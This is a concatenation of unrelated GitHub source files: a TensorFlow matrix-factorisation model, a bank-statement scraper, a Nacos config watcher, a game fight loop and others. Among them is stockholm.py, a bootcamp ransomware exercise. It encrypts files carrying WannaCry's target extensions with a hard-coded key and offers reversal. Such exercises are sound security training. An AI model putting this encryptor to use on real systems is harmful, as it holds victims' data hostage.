                self.row_ids = tf.placeholder(tf.int32, shape=[None], name='row_ids')
                self.col_ids = tf.placeholder(tf.int32, shape=[None], name='col_ids')
                self.values = tf.placeholder(tf.float32, shape=[None], name='values')

                if self.implicit:
                    # Implicit feedback (Hu/Koren-style): binarized targets with
                    # confidence weights derived from the raw counts.
                    # D[i,j] = 1 if R[i,j] > 0 else 0
                    targets = tf.clip_by_value(self.values, 0, 1, name='targets')
                    if self.log_weights:
                        data_weights = tf.add(1.0, alpha * tf.log1p(self.values), name='data_weights')
                    else:
                        data_weights = tf.add(1.0, alpha * self.values, name='data_weights')
                else:
                    # Explicit feedback: raw values, uniform weights.
                    targets = tf.identity(self.values, name='targets')
                    data_weights = tf.constant(1.0, name='data_weights')

            with tf.name_scope('parameters'):
                if self.fit_intercepts:
                    # b0
                    self.global_bias = tf.get_variable('global_bias', shape=[], dtype=tf.float32,
                                                       initializer=tf.zeros_initializer())
                    # bi
                    self.row_biases = tf.get_variable('row_biases', shape=[n], dtype=tf.float32,
                                                      initializer=tf.zeros_initializer())
                    # bj
                    self.col_biases = tf.get_variable('col_biases', shape=[k], dtype=tf.float32,
                                                      initializer=tf.zeros_initializer())

                # P (n, d) matrix
                self.row_weights = tf.get_variable('row_weights', shape=[n, d], dtype=tf.float32,
                                                   initializer = tf.random_normal_initializer(mean=0, stddev=0.01))
                # Q (k, d) matrix
                self.col_weights = tf.get_variable('col_weights', shape=[k, d], dtype=tf.float32,
                                                   initializer = tf.random_normal_initializer(mean=0, stddev=0.01))

            with tf.name_scope('prediction'):
                if self.fit_intercepts:
                    batch_row_biases = tf.nn.embedding_lookup(self.row_biases, self.row_ids, name='row_bias')
                    batch_col_biases = tf.nn.embedding_lookup(self.col_biases, self.col_ids, name='col_bias')

                batch_row_weights = tf.nn.embedding_lookup(self.row_weights, self.row_ids, name='row_weights')
                batch_col_weights = tf.nn.embedding_lookup(self.col_weights, self.col_ids, name='col_weights')

                # P[i,:] * Q[j,:]
                weights = tf.reduce_sum(tf.multiply(batch_row_weights, batch_col_weights), axis=1, name='weights')

                if self.fit_intercepts:
                    biases = tf.add(batch_row_biases, batch_col_biases)
                    biases = tf.add(self.global_bias, biases, name='biases')
                    linear_predictor = tf.add(biases, weights, name='linear_predictor')
                else:
                    linear_predictor = tf.identity(weights, name='linear_predictor')

                if self.loss == 'logistic':
                    self.pred = tf.sigmoid(linear_predictor, name='predictions')
                else:
                    self.pred = tf.identity(linear_predictor, name='predictions')

            with tf.name_scope('loss'):
                # L2 penalty on the factor matrices (and batch biases when fitted).
                l2_weights = tf.add(tf.nn.l2_loss(self.row_weights), tf.nn.l2_loss(self.col_weights),
                                    name='l2_weights')
                if self.fit_intercepts:
                    l2_biases = tf.add(tf.nn.l2_loss(batch_row_biases), tf.nn.l2_loss(batch_col_biases),
                                       name='l2_biases')
                    l2_term = tf.add(l2_weights, l2_biases)
                else:
                    l2_term = l2_weights
                l2_term = tf.multiply(regularization_rate, l2_term, name='regularization')

                if self.loss == 'logistic':
                    loss_raw = tf.losses.log_loss(predictions=self.pred, labels=targets, weights=data_weights)
                else:
                    loss_raw = tf.losses.mean_squared_error(predictions=self.pred, labels=targets,
                                                            weights=data_weights)

                self.cost = tf.add(loss_raw, l2_term, name='loss')

                if self.optimizer == 'Ftrl':
                    self.train_step = tf.train.FtrlOptimizer(self.learning_rate).minimize(self.cost)
                else:
                    self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.cost)

            self.saver = tf.train.Saver()
            init = tf.global_variables_initializer()

        # initialize TF session
        self.sess = tf.Session(graph=self.graph)
        self.sess.run(init)

    def train(self, rows, cols, values):
        """Run one optimization step on a batch of triples; returns the loss."""
        batch = {
            self.row_ids : rows,
            self.col_ids : cols,
            self.values : values
        }
        _, loss_value = self.sess.run(fetches=[self.train_step, self.cost], feed_dict=batch)
        return loss_value

    def predict(self, rows, cols):
        """Return model predictions for the given (row, col) index pairs."""
        batch = {
            self.row_ids : rows,
            self.col_ids : cols
        }
        return self.pred.eval(feed_dict=batch, session=self.sess)

    def coef(self):
        """Return the learned parameters as a dict of numpy arrays."""
        if self.fit_intercepts:
            return self.sess.run(fetches={
                'global_bias' : self.global_bias,
                'row_bias' : self.row_biases,
                'col_bias' : self.col_biases,
                'row_weights' : self.row_weights,
                'col_weights' : self.col_weights
            })
        else:
            return self.sess.run(fetches={
                'row_weights' : self.row_weights,
                'col_weights' : self.col_weights
            })

    def save(self, path):
        # Checkpoint all graph variables to `path`.
        self.saver.save(self.sess, path)

    def restore(self, path):
        # Restore variables from a checkpoint written by save().
        self.saver.restore(self.sess, path)
twolodzko/tfmf
tfmf/tf_model.py
tf_model.py
py
7,146
python
en
code
9
github-code
36
74469828583
#! /usr/bin/env python3 import logging import os import tempfile log = logging.getLogger(__name__) def download_to_disk(config, object_ref): log.debug('Moving file from {} to temporary file'.format(object_ref)) fd, path = tempfile.mkstemp(os.path.splitext(object_ref)[-1]) os.write(fd, open(object_ref, 'rb').read()) os.close(fd) return path
mabruras/sqapi
src/sqapi/query/content/disk.py
disk.py
py
367
python
en
code
2
github-code
36
8786926229
from .abstract import Aggregator
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support.ui import Select
from bs4 import BeautifulSoup
from accagg.browser import Browser
from time import sleep
import re
from datetime import date


class Aggregator(Aggregator):
    """Screen-scraping aggregator for SBI Sumishin Net Bank.

    Logs in with Selenium, walks the ordinary-deposit statement pages and the
    yen time-deposit history, and returns a list of account dicts each with a
    passbook-ordered transaction history.
    """

    @classmethod
    def bankid(self):
        # Bank id is derived from this module's file name.
        return self.__module__.split('.')[-1]

    @classmethod
    def description(self):
        return "SBI Sumishin Net Bank"

    @classmethod
    def login_info(self):
        # Field labels shown to the user ('暗証番号' = PIN).
        return {'USRID': 'ID', 'PASSWORD': '暗証番号'}

    def __decode_date(self, str):
        # Parse a Japanese 'YYYY年MM月DD日' string into a datetime.date.
        # Returns None implicitly when the string does not match.
        match = re.match(r"^(\d+)年(\d+)月(\d+)日$", str)
        if match:
            y = int(match.group(1))
            m = int(match.group(2))
            d = int(match.group(3))
            return date(y, m, d)

    def _decode_amount(self, str):
        # Convert an amount string like '1,234円' to an int.
        # NOTE(review): for a leading '-' this builds '0-…' which int() rejects —
        # confirm whether negative amounts can ever reach this helper.
        if str[0] != '-':
            str = '0' + str
        return int('0' + str.replace(',', '').replace('円', ''))

    def wait_until_blocked(self, b):
        # Poll (up to ~10s) until the site's 'loadingServer' overlay disappears,
        # temporarily disabling the implicit wait so each probe is instant.
        b.implicitly_wait(0)
        for i in range(1, 20):
            try:
                print('try:%d' % i)
                es = b.find_element_by_class_name('loadingServer')
            except NoSuchElementException:
                b.implicitly_wait(180)
                return
            sleep(0.5)

    def run(self, login_info, lastdate):
        """Log in and scrape all accounts; only transactions on/after
        `lastdate` are collected."""
        URL = "https://www.netbk.co.jp"
        self.__lastdate = lastdate
        browser = Browser.firefox()
        browser.implicitly_wait(180)
        # open URL
        browser.get(URL)
        browser.wait_for_loaded()
        # import pdb; pdb.set_trace()
        # Log in ('ログイン' link)
        browser.find_element_by_link_text("ログイン").click()
        # enter credentials
        browser.sync_send_keys((By.NAME, 'userName'), login_info['USRID'])
        browser.sync_send_keys((By.CSS_SELECTOR, 'input[type="password"]'), login_info['PASSWORD'])
        # Click login
        browser.find_element_by_css_selector('button[type="submit"]').click()
        browser.wait_for_title_changed()
        # Wait until the bank's name ('住信') appears in the page title.
        while not '住信' in browser.title:
            sleep(0.1)
        # Dismiss an "important notice" interstitial if one is shown.
        if '重要なお知らせ' in browser.title:
            # Confirmation: press the 'next' link
            browser.wait_element((By.LINK_TEXT, '次へ進む')).click()
            browser.wait_for_loaded()
        # Home page reached
        result = []
        # import pdb; pdb.set_trace()
        # Ordinary deposit accounts
        data = self.__get_ordinary(browser)
        if data:
            result.extend(data)
        # Yen time deposits
        data = self.__get_time_deposit(browser)
        if data:
            result.extend(data)
        browser.quit()
        return result

    def __get_ordinary(self, browser):
        """Scrape every ordinary-deposit account's statement; returns a list of
        account dicts."""
        # import pdb; pdb.set_trace()
        # Open the deposit/withdrawal statement page ('入出金明細')
        self.wait_until_blocked(browser)
        sleep(0.5)
        e = browser.wait_element((By.LINK_TEXT, "入出金明細"))
        # Click via JS to avoid overlay interception.
        browser.execute_script('arguments[0].click();', e)
        self.wait_until_blocked(browser)
        # Enumerate the account-name dropdown ('口座名')
        browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]'))
        num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li'))
        result = []
        for i in range(0, num):
            # Select the i-th account in the dropdown.
            e = browser.find_element_by_css_selector('[nblabel="口座名"]')
            e.click()
            e = e.find_elements_by_css_selector('li')[i]
            subname = e.text
            e.click()
            # First account is plain 'ordinary'; extra accounts get a suffix.
            name = 'ordinary'
            if i > 0:
                name = name + '_' + subname
            result.append({
                'name': name,
                'unit': 'Yen',
                'account': '普通',
                'history': self.__get_ordinary_sub(browser),
            })
        # print(result)
        # Return to the home page ('ホーム')
        self.wait_until_blocked(browser)
        browser.find_element_by_link_text('ホーム').click()
        # wait for display
        browser.wait_for_title_changed()
        browser.wait_for_loaded()
        browser.wait_element((By.LINK_TEXT, 'サイトマップ'))
        return result

    def __get_ordinary_sub(self, browser):
        """Scrape the currently-selected ordinary account's transactions back
        to self.__lastdate, oldest first."""
        # Open the sort/filter panel ('並び替え') and pick date-range mode ('期間指定').
        browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click()
        browser.find_element_by_xpath('//label[contains(text(),"期間指定")]').click()
        # Set the start date to the earliest selectable year/month/day
        # (second entry of each dropdown).
        e = browser.find_elements_by_css_selector('.m-formSelectDate')[0]
        e.find_element_by_css_selector('p.m-select-year nb-simple-select').click()
        e.find_elements_by_css_selector('p.m-select-year li')[1].click()
        e.find_element_by_css_selector('p.m-select-month nb-simple-select').click()
        e.find_elements_by_css_selector('p.m-select-month li')[1].click()
        e.find_element_by_css_selector('p.m-select-day nb-simple-select').click()
        e.find_elements_by_css_selector('p.m-select-day li')[1].click()
        # Apply the filter ('表示' = show)
        browser.find_elements_by_link_text('表示')[1].click()
        # wait for update
        browser.find_elements_by_partial_link_text('明細ダウンロード')
        data = []
        # import pdb; pdb.set_trace()
        while True:
            soup = BeautifulSoup(browser.page_source, "html.parser")
            for row in soup.select('.m-tblDetailsBox'):
                date = self.__decode_date(row.select('.m-date')[0].string)
                # Rows are newest-first; stop once past the requested window.
                if self.__lastdate > date:
                    return data
                desc = row.select('.m-subject span')[0].string
                deposit = self._decode_amount(row.select('.m-txtEx')[0].string)
                # '出' marks a withdrawal.
                if row.select('.m-sign')[0].string == '出':
                    deposit = -deposit
                balance = self._decode_amount(row.select('.m-txtEx')[1].string)
                item = {'date' : date,
                        'price': 1,
                        'amount' : deposit,
                        'payout' : deposit,
                        'desc' : desc,
                        'balance' : balance }
                # print(item)
                # Prepend.
                # Detail list is sorted by descending order
                # Passbook order is ascending
                data.insert(0, item)
            # Check whether there is a 'next' pager link
            browser.implicitly_wait(0)
            es = 0
            try:
                es = browser.find_element_by_css_selector('.m-pager-prev')
                # print(es.get_attribute('outerHTML'))
            except NoSuchElementException:
                # print("no entry")
                break
            if not es:
                break
            browser.implicitly_wait(180)
            next_page = es.text
            es.click()
            # wait for update: the page counter must show the new page number
            while browser.find_element_by_class_name('m-counter').text.split(' ')[0] != next_page:
                sleep(0.1)
        return data

    def __get_time_deposit(self, browser):
        """Scrape yen time-deposit transaction history; returns a list of
        account dicts, or None when the menu entry is absent."""
        # import pdb; pdb.set_trace()
        browser.implicitly_wait(0)
        es = 0
        try:
            # Menu entry: yen deposits / structured deposits
            es = browser.find_element_by_link_text('円預金・仕組預金')
        except NoSuchElementException:
            print("no entry")
            return None
        browser.implicitly_wait(180)
        es.click()
        sleep(0.5)
        # Yen time deposit section ('円定期預金')
        browser.find_element_by_link_text('円定期預金').click()
        # Transaction history ('取引履歴')
        browser.find_element_by_link_text('取引履歴').click()
        # Enumerate the account-name dropdown
        # browser.wait_element((By.CSS_SELECTOR, '[nblabel="口座名"]'))
        num = len(browser.find_elements_by_css_selector('[nblabel="口座名"] li'))
        result = []
        for i in range(0, num):
            # Switch to the i-th account
            browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え')).click()
            e = browser.find_element_by_css_selector('[nblabel="口座名"]')
            e.click()
            e = e.find_elements_by_css_selector('li')[i]
            subname = e.text
            e.click()
            # Sort order (disabled)
            # e = browser.find_element_by_css_selector('[nblabel="並び順"]')
            # e.click()
            # e = e.find_elements_by_css_selector('li')[1]
            # e.click()
            # browser.find_element_by_partial_link_text('表示').click()
            # Wait for the refresh
            browser.wait_element((By.PARTIAL_LINK_TEXT, '並び替え'))
            name = 'time_deposit'
            if i > 0:
                name = name + '_' + subname
            result.append({
                'name': name,
                'unit': 'Yen',
                'account': '普通',
                'history': self.__get_time_deposit_sub(browser),
            })
        # print(result)
        # Return to the home page
        browser.find_element_by_link_text('ホーム').click()
        # wait for display
        browser.wait_for_title_changed()
        browser.wait_for_loaded()
        browser.wait_element((By.LINK_TEXT, 'サイトマップ'))
        return result

    def __get_time_deposit_sub(self, browser):
        """Scrape every page of the selected time-deposit account's history;
        the running balance is reconstructed locally from the deltas."""
        data = []
        balance = 0
        # Read the total page count from the pager text
        num = browser.find_element_by_css_selector('p.m-counter').text
        num = int(num.split(' ')[2])
        for i in range(1, num + 1):
            if i != 1:
                # Jump to page i
                browser.find_element_by_link_text(str(i)).click()
                self.wait_until_blocked(browser)
            soup = BeautifulSoup(browser.page_source, "html.parser")
            for row in soup.select('tr'):
                c = [x for x in row.select('th p')[0].stripped_strings]
                date = self.__decode_date(c[0])
                # if self.__lastdate > date:
                #     break
                desc = ' '.join(c[1:])
                c = [x for x in row.select('td .m-txtEx')[0].stripped_strings]
                deposit = self._decode_amount(c[1])
                # '出' marks a withdrawal.
                if c[0] == '出':
                    deposit = -deposit
                balance += deposit
                item = {'date' : date,
                        'price': 1,
                        'amount' : deposit,
                        'payout' : deposit,
                        'desc' : desc,
                        'balance' : balance }
                # print(item)
                data.append(item)
        return data
t-bucchi/accagg
accagg/bank/sbinetbank.py
sbinetbank.py
py
10,622
python
en
code
0
github-code
36
21821135553
# F*ck implementation problems # Ab to kaam hoja bsdk # Adding comments so it might be helpful to someone ## Moral: Don't watch IPL during contest from collections import Counter for _ in range(int(input())): n = int(input()) lis = list(map(int, input().split())) ## Check for NO condition counter = Counter(lis) if len(counter) <= 1: print("NO") continue print("YES") oneWala = [1] # Every index a[0]!=a[idx] othersWala = [] # if equals then it cannot be in oneWala for i in range(1, n): if lis[i] != lis[0]: oneWala.append(i + 1) else: othersWala.append(i + 1) ## We need to have atleast one edge from oneWala to othersWala ## So check diff element in oneWala to connect to othersWala element flag = 0 idx = -1 for i in oneWala: for j in othersWala: if lis[i - 1] != lis[j - 1]: idx = i-1 flag = 1 break if flag: break ## Now connect everything in oneWala to 1 for i in oneWala: if i != 1: print(1, i) if len(othersWala) == 0: continue ## Now connect everything in othersWala to othersWala[0] for i in othersWala: print(idx + 1, i)
sainad2222/my_cp_codes
codeforces/1433/D.py
D.py
py
1,155
python
en
code
0
github-code
36
44638762028
# **************************************************************************** #
#                                                                              #
#                                                         :::      ::::::::    #
#    stockholm.py                                       :+:      :+:    :+:    #
#                                                     +:+ +:+         +:+      #
#    By: mariza <mariza@student.42.fr>              +#+  +:+       +#+         #
#                                                 +#+#+#+#+#+   +#+            #
#    Created: 2023/05/10 09:46:33 by mariza            #+#    #+#              #
#    Updated: 2023/05/30 09:56:06 by mariza           ###   ########.fr        #
#                                                                              #
# **************************************************************************** #

import argparse
import os
import os.path

from cryptography.fernet import Fernet

RUTA = '/Users/mariza/Desktop/repo-terminados-bootcamp/stockholm/home/infection'
KEY = 'PyMEtpcBTPNHI7y_wlN1dHK_K_NElzbGeYT92ksziJo='

# Extensions targeted by the infection (WannaCry's historical target list).
# Shared by new_ext() and wannacry() -- it was previously duplicated inline.
EXT = (".der", ".pfx", ".key", ".crt", ".csr", ".p12", ".pem", ".odt",
       ".ott", ".sxw", ".stw", ".uot", ".3ds", ".max", ".3dm", ".ods",
       ".ots", ".sxc", ".stc", ".dif", ".slk", ".wb2", ".odp", ".otp",
       ".sxd", ".std", ".uop", ".odg", ".otg", ".sxm", ".mml", ".lay",
       ".lay6", ".asc", ".sqlite3", ".sqlitedb", ".sql", ".accdb", ".mdb",
       ".db", ".dbf", ".odb", ".frm", ".myd", ".myi", ".ibd", ".mdf",
       ".ldf", ".sln", ".suo", ".cs", ".c", ".cpp", ".pas", ".h", ".asm",
       ".js", ".cmd", ".bat", ".ps1", ".vbs", ".vb", ".pl", ".dip", ".dch",
       ".sch", ".brd", ".jsp", ".php", ".asp", ".rb", ".java", ".jar",
       ".class", ".sh", ".mp3", ".wav", ".swf", ".fla", ".wmv", ".mpg",
       ".vob", ".mpeg", ".asf", ".avi", ".mov", ".mp4", ".3gp", ".mkv",
       ".3g2", ".flv", ".wma", ".mid", ".m3u", ".m4u", ".djvu", ".svg",
       ".ai", ".psd", ".nef", ".tiff", ".tif", ".cgm", ".raw", ".gif",
       ".png", ".bmp", ".jpg", ".jpeg", ".vcd", ".iso", ".backup", ".zip",
       ".rar", ".7z", ".gz", ".tgz", ".tar", ".bak", ".tbk", ".bz2",
       ".PAQ", ".ARC", ".aes", ".gpg", ".vmx", ".vmdk", ".vdi", ".sldm",
       ".sldx", ".sti", ".sxi", ".602", ".hwp", ".snt", ".onetoc2", ".dwg",
       ".pdf", ".wk1", ".wks", ".123", ".rtf", ".csv", ".txt", ".vsdx",
       ".vsd", ".edb", ".eml", ".msg", ".ost", ".pst", ".potm", ".potx",
       ".ppam", ".ppsx", ".ppsm", ".pps", ".pot", ".pptm", ".pptx", ".ppt",
       ".xltm", ".xltx", ".xlc", ".xlm", ".xlt", ".xlw", ".xlsb", ".xlsm",
       ".xlsx", ".xls", ".dotx", ".dotm", ".dot", ".docm", ".docb",
       ".docx", ".doc")

parser = argparse.ArgumentParser()
parser.add_argument('-v', '--version', dest='v', action='store_true',
                    help='muestra la version del programa')
parser.add_argument('-r', '--reverse', dest='r', type=str,
                    help='revierte la infeccion')
parser.add_argument('-s', '--silent', dest='s', action="store_true",
                    help='hace la infeccion sin hacer ningun output')
parser.add_argument('-f', type=str, default=RUTA,
                    help='manda los archivos a una carpeta especifica')
args = parser.parse_args()


def new_ext(ruta):
    """Append the '.ft' marker extension to every targeted file in *ruta*."""
    for name in os.listdir(ruta):
        ruta_archivo = os.path.join(ruta, name)
        if os.path.isfile(ruta_archivo) and os.path.splitext(name)[1] in EXT:
            os.rename(ruta_archivo, os.path.join(ruta, name + '.ft'))


def wannacry(silent=False):
    """Encrypt every targeted file under RUTA with the hard-coded Fernet key.

    After encrypting, files are renamed with a '.ft' suffix so that
    desencriptado_archivos() can find them later.
    """
    fernet = Fernet(KEY)
    try:
        for name in os.listdir(RUTA):
            path = os.path.join(RUTA, name)
            # Skip directories and non-targeted extensions up front: the
            # original opened every listdir() entry first, which raised on
            # sub-directories and was silently swallowed by a bare `except`.
            if not os.path.isfile(path) or os.path.splitext(name)[1] not in EXT:
                continue
            with open(path, 'rb') as f:
                datos = f.read()
            with open(path, 'wb') as f:
                f.write(fernet.encrypt(datos))
            if not silent:
                print(f'El archivo {name} ha sido encriptado')
        # Rename the encrypted files to *.ft -- this call was commented out,
        # which left nothing for the -r/--reverse path to decrypt.
        new_ext(RUTA)
    except FileNotFoundError:
        # Typo fixed: the original printed 'exite' instead of 'existe'.
        print('La carpeta home no existe.')


def desencriptado_archivos(key, file, silent=False):
    """Decrypt every '*.ft' file under RUTA into the *file* directory.

    *key* is the Fernet key supplied on the command line; the '.ft'
    suffix is dropped when writing each restored file.
    """
    try:
        if not os.path.exists(file):
            os.makedirs(file)
        fernet = Fernet(key)
        for name in os.listdir(RUTA):
            if not name.endswith('.ft'):
                continue
            with open(os.path.join(RUTA, name), 'rb') as f:
                datos_archivo = f.read()
            descifrado = fernet.decrypt(datos_archivo)
            # os.path.splitext strips the trailing '.ft'.
            destino = os.path.splitext(os.path.join(file, name))[0]
            with open(destino, 'wb') as f:
                f.write(descifrado)
            if not silent:
                print(f'El archivo {name} ha sido desencriptado')
    except Exception:
        # Covers a bad/garbled key (InvalidToken, ValueError) as well as a
        # missing RUTA; the original bare `except:` also hid genuine bugs.
        print('La clave introducida no es válida')


if __name__ == '__main__':
    if args.r:
        desencriptado_archivos(args.r, args.f, args.s)
    elif args.v:
        print('version 1.0')
    else:
        wannacry(args.s)
Mankestark/Proyectos-terminados-bootcamp-ciberseguridad
stockholm/stockholm.py
stockholm.py
py
7,398
python
uk
code
0
github-code
36
22192834373
def convert_to_binary(tmp): flag = False s = '' while not flag: if tmp < 2: s += str(tmp) flag = True else: s += str(tmp % 2) tmp = int(tmp / 2) print(f'Овтет: {s[::-1]}') def start_task(): print('\nЗадача 4: Перевод в двоичную\n' + 'Напишите программу, которая будет '+ 'преобразовывать десятичное число в двоичное.') tmp = int(input('Введите число: ')) convert_to_binary(tmp) start_task()
Minions-Wave/GB-Minions-Wave
The Big Brain Solutions/Personal Zone/NighTramp Solutions/Blok 2/Python/HomeWork/Seminar003/task_4.py
task_4.py
py
611
python
ru
code
2
github-code
36
26281206663
#!/usr/bin/env python3
# coding:utf-8
import os
import hashlib
import shutil
import subprocess
from datetime import datetime

import nacos
import yaml
from apscheduler.schedulers.blocking import BlockingScheduler
from dotenv import load_dotenv, find_dotenv

# Load .env file (override=True lets .env values win over existing env vars).
load_dotenv(find_dotenv(), override=True)

SERVER_ADDRESSES = os.getenv("nacos_server")
NAMESPACE = os.getenv("nacos_namespace_id")
USERNAME = os.getenv("nacos_suth_user")
PASSWORD = os.getenv("nacos_auth_passwd")

# Authenticated Nacos client; one callback thread is enough for this job.
client = nacos.NacosClient(SERVER_ADDRESSES, namespace=NAMESPACE,
                           username=USERNAME, password=PASSWORD)
client.set_options(callback_thread_num=1)


class Watcher():
    """Keeps local config files in sync with their Nacos counterparts."""

    def __init__(self):
        # `cf` is the parsed config.yaml loaded in the __main__ block below.
        self.cf = cf

    def run(self):
        """Register a config watcher for every configured data-id/group."""
        for p in self.cf['configs']:
            self.cf_path = p['path']
            self.watch(id=p['id'], group=p['group'])

    def file_md5(self, file_path):
        """Return the hex MD5 digest of *file_path*'s contents."""
        with open(file_path, 'rb') as fh:
            return hashlib.md5(fh.read()).hexdigest()

    def print_cm(self, status):
        """Nacos watch callback: when the snapshot differs from the local
        file, copy it over and run the configured reload command."""
        snapshot_file = "{0}+{1}+{2}".format(status['data_id'], status['group'], NAMESPACE)
        snapshot_path = "nacos-data/snapshot/{}".format(snapshot_file)
        for p in self.cf['configs']:
            if status['data_id'] == p['id'] and status['group'] == p['group']:
                if self.file_md5(snapshot_path) != self.file_md5(p['path']):
                    # Close both handles deterministically -- the original
                    # leaked two open() calls here.
                    with open(snapshot_path, "rb") as src, open(p['path'], "wb") as dst:
                        shutil.copyfileobj(src, dst)
                    s, r = subprocess.getstatusoutput(p['command'])
                    if int(s) != 0:
                        print("命令执行失败:{}".format(p['command']))
        return True

    def watch(self, id, group):
        """Attach print_cm as the watcher for (data id, group)."""
        client.add_config_watcher(id, group, self.print_cm)


if __name__ == '__main__':
    # Parse config.yaml; safe_load avoids executing arbitrary YAML tags
    # (yaml.load without an explicit Loader is deprecated and unsafe).
    with open('config.yaml', 'r') as f:
        cf = yaml.safe_load(f)

    # Long-running scheduler: (re)register the watchers every minute.
    scheduler = BlockingScheduler()
    job = Watcher()
    scheduler.add_job(job.run, 'interval', minutes=1)
    try:
        print("{0} nacos watch the process start".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
        scheduler.start()
    except (KeyboardInterrupt, SystemExit):
        print("{0} nacos watch the process exit".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
        scheduler.shutdown()
GounGG/nacos-client-py
nacos-get-config.py
nacos-get-config.py
py
2,424
python
en
code
1
github-code
36
2708690996
from src.GameLogic.GenericGameLogic import GenericGameLogic class FightCycle(GenericGameLogic): def __init__(self, printMethod, data): super().__init__(printMethod,data) self.turn_order = None self.current_character = None self.index = 0 async def getMessage(self, message, actionPrompt): if not message.author.name == self.current_character.user: await self.printMethod(message.channel, "WAIT YOUR TURN") return await actionPrompt.do_action(message) await self.end_turn(message) async def end_turn(self, message): self.index = (self.index + 1) % (len(self.turn_order)) self.current_character = self.turn_order[self.index] await self.printMethod(message.channel, "It is now {}'s turn".format(self.current_character.name)) if self.current_character.is_npc(): await self.printMethod(message.channel, self.current_character.do_combat()) await self.end_turn(message) async def start_cycle(self, message): # Init the fight self.index = 0 self.turn_order = sorted(self.data.get_characters_from_current_room(), key=lambda c: c.speed, reverse=True) self.current_character = self.turn_order[self.index] await self.printMethod(message.channel, "The fight is on between {} and {}" .format(", ".join([c.name for c in self.data.get_player_characters_from_current_room()]) ,", ".join([c.name for c in self.data.get_npcs_from_current_room()]))) if self.current_character.is_npc(): await self.printMethod(message.channel, self.current_character.do_combat())
dndiscord/dndiscord
src/GameLogic/FightCycle.py
FightCycle.py
py
1,751
python
en
code
0
github-code
36
22359845771
def set_cover(universe, subsets): """Find a family of subsets that covers the universal set""" elements = set(e for s in subsets for e in s) # Check the subsets cover the universe if elements != universe: return None covered = set() cover = [] # Greedily add the subsets with the most uncovered points while covered != elements: subset = max(subsets, key=lambda s: len(s - covered)) cover.append(subset) covered |= subset return cover def main(): universe = set(range(1, 11)) subsets = [set([1, 2, 3, 8, 9, 10]), set([1, 2, 3, 4, 5]), set([4, 5, 7]), set([5, 6, 7]), set([6, 7, 8, 9, 10])] print("Universe is", universe) print("Subsets are") for i in subsets: print(i) print() cover = set_cover(universe, subsets) print("Set cover is", cover) if __name__ == '__main__': main()
LokeshNaidu8/MSc_Practicals
Practicals/Algorithm/setCover.py
setCover.py
py
941
python
en
code
1
github-code
36
38054510986
import accept
import logging
from aiohttp import web, web_exceptions
from aiohttp_swagger import setup_swagger
from model import ClientModel, ItemNotFoundException
from protocol import *
from prometheus_client import REGISTRY, exposition
from urllib.parse import parse_qs
from voluptuous import MultipleInvalid


class Api:
    """aiohttp REST API for clients and their payment cards.

    Content negotiation is driven by the Accept header (JSON and XML
    encoders come from `protocol`); Prometheus metrics are exposed on
    /metrics and swagger docs on /v1/docs. The Russian YAML docstrings
    on the handlers below are consumed at runtime by aiohttp_swagger to
    render the API documentation, so they are kept verbatim.
    """

    DEFAULT_CONTENT_TYPE = "application/json"
    logger = logging.getLogger(__name__)
    registry = REGISTRY
    # Media type -> encoder instance (XMLEncoder/JsonEncoder from protocol).
    __encoders = {
        "application/xml": XMLEncoder(),
        "application/json": JsonEncoder()
    }

    def __init__(self, host, port, transactor):
        self.__app = web.Application()
        self.__host = host
        self.__port = port
        self.__app.add_routes([
            web.get('/', self.health),
            web.get('/metrics', self.metrics),
            web.get('/v1/cards', self.card_list),
            web.post('/v1/cards', self.add_card),
            web.get('/v1/clients', self.client_list),
            web.post('/v1/clients', self.add_client),
            web.get(r'/v1/clients/{id:\d+}/balance', self.client_balance),
            web.put(r'/v1/cards/{id:\d+}', self.change_card)
        ])
        self.__client_model = ClientModel(transactor)

    def __paginate(self, request):
        # Extract offset/limit from the query string; defaults 0/20.
        # Repeating either parameter is rejected as a bad request.
        qs = parse_qs(request.query_string)
        offsets = qs.get('offset', [0])
        if len(offsets) > 1:
            raise web_exceptions.HTTPBadRequest(text='Invalid offset value')
        limits = qs.get('limit', [20])
        if len(limits) > 1:
            raise web_exceptions.HTTPBadRequest(text='Invalid limit value')
        return int(offsets[0]), int(limits[0])

    def __choose_encoder(self, request):
        # Walk the parsed Accept header in preference order; '*/*' maps to
        # the default content type. 406 when nothing matches.
        for accept_header in accept.parse(request.headers.get('Accept')):
            if accept_header.media_type == '*/*':
                return self.__encoders.get(self.DEFAULT_CONTENT_TYPE)
            encoder = self.__encoders.get(accept_header.media_type)
            if encoder is not None:
                return encoder
        raise web_exceptions.HTTPNotAcceptable()

    async def __decode_post(self, request):
        # NOTE(review): the XML branch returns a stub dict instead of
        # parsing the request body -- confirm whether XML input is meant
        # to be supported.
        if request.content_type == "application/json":
            return await request.json()
        if request.content_type == "application/xml":
            return {"data": "xml"}
        raise web_exceptions.HTTPBadRequest(
            text="Unknown Content-Type header. Only application/json, application/xml are allowed."
        )

    async def start(self):
        """Mount swagger docs and start serving on the configured host/port."""
        setup_swagger(self.__app, swagger_url='/v1/docs')
        runner = web.AppRunner(self.__app)
        await runner.setup()
        service = web.TCPSite(runner, self.__host, self.__port)
        await service.start()
        self.logger.info('Service is started at %s:%s', self.__host, self.__port)

    async def health(self, _):
        """
        ---
        description: Запрос для проверки успешного запуска сервиса.
        tags:
        - Health check
        produces:
        - text/plain
        responses:
            "200":
                description: успех. Возвращает информацию о сервисе
        """
        return web.Response(text="Ok")

    async def metrics(self, request):
        """
        ---
        description: Запрос для получения метрик сервиса
        tags:
        - Metrics
        produces:
        - text/plain
        responses:
            "200":
                description: успех. Возвращает метрики
        """
        # prometheus_client picks the exposition format from the Accept header.
        encoder, content_type = exposition.choose_encoder(request.headers.get('Accept'))
        scrape = encoder(self.registry)
        return web.Response(headers=dict([('Content-Type', content_type)]), body=scrape)

    async def card_list(self, request):
        """
        ---
        description: Запрос для получения списка карт клиентов
        tags:
        - Cards
        produces:
        - application/json
        - application/xml
        parameters:
        - name: offset
          in: query
          description: Pagination offset
          required: false
          type: integer
        - name: limit
          in: query
          description: Pagination limit
          required: false
          type: integer
